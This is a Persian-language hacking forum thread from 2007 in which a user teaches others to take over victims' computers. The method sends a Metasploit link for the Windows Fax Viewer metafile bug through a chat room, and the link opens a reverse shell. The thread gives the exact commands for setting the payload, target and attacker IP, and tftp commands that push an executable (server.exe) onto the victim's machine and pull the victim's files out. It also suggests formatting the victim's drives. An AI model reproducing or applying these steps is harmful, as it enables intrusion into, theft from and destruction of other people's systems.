هک از طریق چت بدون ازسال فایل

**!!SPY!!** · Thursday 22 March 2007, 11:39 PM

در متدی جدید که با باگ موجود در Windows Fax Viewer کار می کند . شما لینکی برای قربانی در چت روم می فرستید و بعد از کلیک کردن آن لینک توسط قربانی به شما از وی Shell ( قابلیت کنترل کامل کامپیوتر وی) میگیرید نوع Shell در این روش از نوع Reverse می باشد و فابلیت عبور از ّFirewall را دارا ست .ابزار لازم در این کار همان Metasploit است که مجموعه باگ هاو ابزار های نفوذ می باشد که قبلآ نحوه ی کار و دستورات آن در سایت آموزش داده شده لینک دریافت Metasploit framework-2.5 - توجه : اگر قبلآ نسخه Metasploit framework-2.4 را دریافت کرده اید این باگ هنوز به آن اضافه نشده و شما بایستی در پوشه برنامه MSFupdate را بزنید تا باگ های جدید مانند ie_xp_pfv_metafile به آن اضافه شود. برای کنترل صحت update می توانید بعد از اجرای برنامه دستور show exploits را بزنید و لیست باگ ها را مشاهده و با دستور use از آن ها استفاده کنید بنابراین تایپ می کنید use ie_xp_pfv_metafile حال شما این exploit را اجرا کرده اید و بایستی یک سری مقادیر را به برنامه بدهید مانند ip شما و پورت کاربردی . نوع سیستم عامل قربانی . نوع payload (ارتباط ) . دراین با فرض اینکه ip من http://217.216.30.40 باشد به برنامه مقدار دهی میکنم . بزنید set TARGET 0 و بعد آن
بزنید set PAYLOAD win32_reverse و بعد ان
بزنید set HTTPHOST 217.216.30.40 و بعد آن
بزنید set LHOST 217.216.30.40
و در آخر بزنید exploit . حال برنامه یک لینک از ip شما به شما می دهد که در اینجا به من لینک http://217.216.30.40:8080 را می دهد و منتظر ارتباط با قربانی می ایستد . با کلیک قربانی روی این لینک شما در این برنامه shell از سیستم وی را مشاهده خواهید نمود .شما در این shell قادر به اجرای همه گونه فرمان بر روی سیستم قربانی می باشید به طور مثال Format یک درایو و پاک کردن فایل ها توسط دستورات dos. و انگار از سیستم قربانی وارد cmd شده اید . برای ارسال و گرفتن فایل هم می توانید به مقاله ی آموزشی که در سایت قرار داده شده رجوع کنید

**!!SPY!!** · Thursday 22 March 2007, 11:40 PM

Metasploit Framework مجموعه ای از باگ های سیستم عامل ها و برنامه های آن ها می باشد که به در یافت Shell و دسترسی کامل به سیستم هدف ختم میشود .در حال حاضر این مجموعه دارای 81 باگ می باشد که بسیاری از آن ها هنوز patch نشده وبرای هک کردن سرور و یا کلاینت ها بهترین انتخاب می باشد .این برنامه گزینه ی update داشته و خودش را بوسیله آن به روز می کنید و شما را از پیدا کردن bug های جدید و compile آن ها بی نیاز میکند .این برنامه حالت های payload مختلفی دارد که کارائی فراوانی دارد برای شروع پس از دریافت آن از اینجا و updtae آن باید در داخل برنامه
تایپ کنید show exploits که با این دستور لیست باگ ها نمایش می یابد و شما میتوانید با دستور use exploit name یکی از آن ها را اجرا کنید در آن جا

show PAYLOADS این دستور لیست حالت های اتصال را نمایش می دهد . مثلآ و قتی در سیستم طرف firewall وجود دارد با انتخاب payload ه win32_reverse با کمک این دستور set PAYLOAD win32_reverse به برنامه می گوئید که در گرفتن shell سیستم ارتباط از طرف سیستم قربانی با شما باشد تا بتواند firewall را دور بزند (چون او به شما وصل شده و فایروال تنها با دریافت مشکل دارد)
set RHOST 66.66.78.44 با این دستور به برنامه می گویید که ip remote host کسی که می خواهید از آن shell بگیرید 66.66.78.44 می باشد
set LHOST 65.76.54.77 با کمک این دستور به برنامه می گوئید که ip شما 65.76.54.77 می باشد . این گزینه در حالت payload ه win32_reverse استفاده می شود تا سیستم قربانی به این ip وصل شود
show TARGETS لیست سیستم های آسیب پذیر در این باگ را نمایش میدهد با عدد خاص رویروی آن مثلآ All Windows 0 شما با استفاده از دستور set TARGET 0 به برنامه میگوئید که All Windows می باشد
show OPTIONS لیست متغیر های مقدار پذیر مانند RHOST و ... را با مقدار داده شده توسط شما نشان می دهد که برای کنترل درستی کار مفید می باشد
exploit این دستور با داده های ورودی شما شروع به shell گرفتن می کند
starting bind handler
get connection from

**!!SPY!!** · Thursday 22 March 2007, 11:41 PM

وقتی که ما از یک Server و یا یک Client با استفاده از باگ آن (بطور مثال Lsass ,Dcom ,IIS ,Apache,Mysql ,...) یک سطح دسترسی (Shell ) می گیریم می تونیم اونجا مثل Command pormpt سیستم خودمون کارائی انجام بدیم و لی برای ارسال و دریافت فایل باید از tftp استفاده کنیم .کلاینت این برنامه در شاخه ی System32 همه ی سیستم عامل های windows هستش و شما می تونید با اجرا کردن tftpدر سیستم خودتون نقش Server رو بازی کنید و چون به کلاینت اون دسترسی دارید بهش دستور ارسال و دریافت از Server تون که تو سیستم شما در حال اجراست رو بدید (یک ارتباط Client & ُServer ای )
خوب برای شروع این کار بعد از داونلودtftp فایل tftpd32.exe رو از توش اجرا کنید و قتی که باز شد می تونید ip خودتون رو اونجا ببینید اگه اولش 192 داشت یا به بیانی Unvalid بود برین اینجا و ip valid خودتون رو ببینید چون به این ip احتیاج داریم .بعدش دکمه ی Browse رو تو tFtp بزنید و به طور مثال دایرکتری Desktop رو بهش بدید و بعدش show Dir رو تو برنامه بزنید و فایلی رو که میخواین به سیستم طرف انتقال بدین رو انتخاب کنید مثلآ Server.exe
خوب حالا برید تو shell ای که ازش گرفتین و به tFtp اون دستور بدید که Server.exe رو بگیره برای این کار از این دستور استفاده کنید Tftp -i 62.32.45.67 get server.exe که این ip همون ip ای هستش که از تو سایت گرفتیم (ip خودتون) دستور get برای اینه که به tFtp اون بگه فایل رو بگیره . شما در هر دایرکتری در سیستم طرف که باشید این فایل همون جا کپی مس شه و تو shell مینویسه Transfer Successful
حال برای اینکه بتونیم فایلی رو از سیستمش بگیریم باید بریم تو همون شاخه ای که اون فایل هست تو shell بعد اونجا بنویسیم
tFtp -i 62.32.45.67 post aks.jpg با این دستور فایل ( عکس و برنامه و ..) رو که از سیستم اون برای شما می فرسته که درصد فایل های ارسالی و دریافتی تو tFtp قابل مشاهده هستش
این روش ارسال و دریافت رو برای شلی که با iRcHaTaN Ps 7.1 از سیستم قربانی میگیدید هم میتونید استفاده کنید
برای ارسال: Tftp -i 62.32.45.67 get server.exe
برای دریافت: Tftp -i 62.32.45.67 post server.exe

**bxit** · Thursday 22 March 2007, 11:43 PM

با تشکر از زحمات شما
این ورژن قدیمی شده و دیگه کار نمیدهد اگر در مورد ورژن جدید Metasploit یه آموزش بدهید ممنون میشم

**!!SPY!!** · Friday 23 March 2007, 12:19 AM

دوست عزیز عجله نداشته باش خیلی از دوستان هنوز با این شیوه اشنا نیستند

مورد ورژن جدید Metasploit یه آموزش برات می زارم

**nickcarter** · Saturday 24 March 2007, 03:27 PM

اگر متدی که من بلدم بگم دیگه دنبال راهکارهای قدیمی نمیرید
این روشی که شما فرمودید قدیمی هست به این ترتیب که با برنامه winshell هست که یک لینک به طرف میفرستید که طزف باز که کرد ip در winshell ظاهر میشه که شما یک back door کردید ومیتوانید shell ازسیستم طرف بگیرید
من یک خواهش از تمام دوستان بخصوص spy دارم:که مطالبی که الان بدرد نمیخوره ودوستان سر در گم وخسته میشوند را مطرح و بیان نفرمایند
و مطالب سایتهای دیگر را copy و paste نفرماید

**nima_g** · Sunday 25 March 2007, 08:56 AM

وقتی که کاربرد نداره آموزش این برنامه چه فایده ای دارد؟؟؟

**!!SPY!!** · Sunday 25 March 2007, 09:33 AM

نقل قول:

نوشته اصلی توسط nima_g

وقتی که کاربرد نداره آموزش این برنامه چه فایده ای دارد؟؟؟

دوستان عزیز مطمین هستم هیچ کدوم از شما حتی یکبار هم از این برنامه استفاده نکردید
من میدونم این برنامه قدیمی شده ولی هنوز کارایی خودشو دارد
پس یکبار امتحانش کنید
مطمین هستم به یکبار امتحان کردنش می ارزد

موضوعات مشابه
موضوع	نویسنده موضوع	انجمن	پاسخ ها	آخرين نوشته
مباني ويندوز و شبکه ( بخش اول )	arash_80099	ترفند های شبکه	0	Friday 2 March 2007 11:26 PM
نحوه راه اندازي يك Isp بخش دوم	Kamran1358	سخت افزار	0	Tuesday 6 February 2007 09:15 AM
آنچه از گوگل نمي*دانيد......	hamed_fbi	فناوری اطلاعات (IT)	0	Tuesday 5 December 2006 07:13 PM

ابزارهای موضوع
پرینت این صفحه / حالت نمایش بصورت پرینت شده ارسال این صفحه به ایمیل یک دوست یا خودتان

هک از طریق چت بدون ازسال فایل

موضوعات مشابه

100 Search 2

100
Search 2